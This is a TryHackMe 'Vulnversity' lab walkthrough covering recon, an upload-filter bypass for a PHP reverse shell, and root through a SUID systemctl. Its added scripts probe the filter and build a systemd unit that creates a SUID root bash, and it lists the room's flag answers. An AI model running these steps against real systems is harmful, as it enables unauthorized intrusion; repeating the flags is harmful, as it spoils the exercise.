This is my TryHackMe walkthrough, created to document my learning journey and share solutions with the community. The writeups include a mix of hints, step-by-step explanations, and final answers to help players who get stuck, while still encouraging independent problem-solving.
Vulnversity Room - Learn about active recon, web app attacks and privilege escalation.
Overview
- Room URL: https://tryhackme.com/room/vulnversity
- Difficulty: Easy
- Time to complete: 45 minutes
Walkthrough
1. Deploy the machine
No hints needed!
2. Reconnaissance
Scan the box; how many ports are open?
nmap -p- <MACHINE_IP>
=> Answer: 6
What version of the squid proxy is running on the machine?
nmap -p- -A <MACHINE_IP>
=> Answer: 4.10
How many ports will Nmap scan if the flag -p-400 was used?
A port range with no lower bound starts at 1, so -p-400 means ports 1 through 400.
=> Answer: 400
What is the most likely operating system this machine is running?
nmap -O <MACHINE_IP>
The OS fingerprint only narrows it to Linux; the service banners from the -A scan (both OpenSSH and Apache report "Ubuntu" in their version strings) pin down the distribution.
=> Answer: Ubuntu
What port is the web server running on?
nmap -p- -A <MACHINE_IP>
=> Answer: 3333
What is the flag for enabling verbose mode using Nmap?
=> Answer: -v
3. Locating directories using Gobuster
What is the directory that has an upload form page?
gobuster dir -u http://<MACHINE_IP>:3333 -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt
=> Answer: /internal/
4. Compromise the Webserver
What common file type you'd want to upload to exploit the server is blocked? Try a couple to find out.
=> Answer: .php
What extension is allowed after running the above exercise?
=> Answer: .phtml
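The "try a couple to find out" step can be scripted instead of submitting the form by hand. The script below is an added example, not part of the original walkthrough or the room. It assumes the upload form posts a multipart field named "file" to http://<MACHINE_IP>:3333/internal/index.php and answers with "Extension not allowed" on a rejected file and "Success" on an accepted one; check those three things in Burp or the browser's network tab and adjust TARGET, FIELD and the matched strings if the real form differs. The extension list is a constructed set of alternatives that Apache's mod_php configuration may still hand to the PHP interpreter.

```shell
#!/bin/sh
# Added example: probe which extensions the /internal/ upload form accepts.
# Assumptions (not from the walkthrough): multipart field name "file",
# rejection text "Extension not allowed", acceptance text "Success".
set -u

TARGET="${TARGET:-http://10.10.10.10:3333/internal/index.php}"   # assumed endpoint
FIELD="${FIELD:-file}"                                             # assumed field name

# Constructed candidate list: the blocked .php plus alternate PHP extensions.
EXTENSIONS="php php3 php4 php5 phtml phar"

# classify_upload_response BODY -> prints "blocked", "allowed" or "unknown"
# by matching the assumed server messages in the response body.
classify_upload_response() {
  case "$1" in
    *"Extension not allowed"*) printf 'blocked\n' ;;
    *"Success"*)               printf 'allowed\n' ;;
    *)                         printf 'unknown\n' ;;
  esac
}

# probe_extension EXT -> uploads a harmless one-line PHP file named test.EXT
# and prints "EXT: verdict". Needs network access to TARGET.
probe_extension() {
  ext="$1"
  tmp="$(mktemp -d)"
  printf '<?php echo "upload-probe"; ?>\n' > "$tmp/test.$ext"
  body="$(curl -s --max-time 10 -F "$FIELD=@$tmp/test.$ext" "$TARGET")"
  rm -rf "$tmp"
  printf '%s: %s\n' "$ext" "$(classify_upload_response "$body")"
}

# probe_all -> tries every extension in EXTENSIONS in turn.
probe_all() {
  for ext in $EXTENSIONS; do
    probe_extension "$ext"
  done
}

# Run the probes only when invoked as `sh upload-probe.sh probe`, so the
# functions can also be sourced and reused without touching the network.
if [ "${1:-}" = "probe" ]; then
  probe_all
fi
```

Run it as `TARGET=http://<MACHINE_IP>:3333/internal/index.php sh upload-probe.sh probe`; an "unknown" verdict means the form's messages differ from the assumed ones and the two strings in classify_upload_response need updating from a real response.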
What is the name of the user who manages the webserver?
Upload a PHP reverse shell using the allowed .phtml extension, start a listener, and request the uploaded file to get a shell as the web server user; the home directories on the box then show who it belongs to.
=> Answer: bill
What is the user flag?
=> Answer: 8bd7992fbe8a6ad22a63361004cfcedb
5. Privilege Escalation
On the system, search for all SUID files. Which file stands out?
Compare the list against what a stock Ubuntu install normally has set SUID (su, sudo, passwd, mount and friends); a root-owned SUID systemctl is not in that set.
=> Answer: /bin/systemctl
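The SUID search above, plus the step from a SUID systemctl to root, as an added example that is not part of the original walkthrough or the room. It assumes systemctl is SUID root on the target (which is what the answer indicates) and that /tmp is writable; the baseline list of "normal" SUID binaries is constructed for this example from a typical Ubuntu box and should be extended from a reference system you trust. The unit-file trick is the standard GTFOBins technique for a SUID systemctl: systemctl will link and start a unit you wrote, and its ExecStart runs as root.

```shell
#!/bin/sh
# Added example: enumerate SUID-root binaries, flag the ones that are not on a
# stock Ubuntu baseline, and build the systemd unit used to abuse a SUID
# systemctl. Baseline and listener details are constructed, not from the page.

# Constructed baseline of SUID binaries that are expected on a stock Ubuntu box.
BASELINE_SUID="/bin/su /bin/mount /bin/umount /bin/ping /bin/fusermount
/usr/bin/passwd /usr/bin/sudo /usr/bin/chsh /usr/bin/chfn /usr/bin/gpasswd
/usr/bin/newgrp /usr/bin/pkexec /usr/bin/at /usr/lib/openssh/ssh-keysign"

# find_suid -> lists root-owned SUID files on the live system; errors from
# unreadable directories are discarded.
find_suid() {
  find / -user root -perm -4000 -type f 2>/dev/null
}

# flag_unusual_suid LIST -> prints each path in LIST (newline-separated) that
# is not in BASELINE_SUID. Those are the privilege-escalation candidates.
flag_unusual_suid() {
  known=" $(printf '%s' "$BASELINE_SUID" | tr '\n' ' ') "
  printf '%s\n' "$1" | while IFS= read -r path; do
    [ -z "$path" ] && continue
    case "$known" in
      *" $path "*) ;;               # known-benign, skip
      *) printf '%s\n' "$path" ;;   # not on the baseline: report it
    esac
  done
}

# root_unit CMD -> prints a oneshot systemd unit whose ExecStart runs CMD.
# Started through a SUID-root systemctl, CMD executes as root.
root_unit() {
  cat <<EOF
[Service]
Type=oneshot
ExecStart=/bin/sh -c "$1"
[Install]
WantedBy=multi-user.target
EOF
}
```

On the target: `flag_unusual_suid "$(find_suid)"` should print /bin/systemctl. Then `root_unit 'cp /bin/bash /tmp/rootbash && chmod 4755 /tmp/rootbash' > /tmp/root.service`, `systemctl link /tmp/root.service`, `systemctl start root`, and `/tmp/rootbash -p` gives a root shell (the -p keeps the effective UID). A reverse shell in place of the cp command works the same way if you prefer a listener.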
What is the root flag value?
=> Answer: a58ff8579f0a9270368d33a9966c7fd5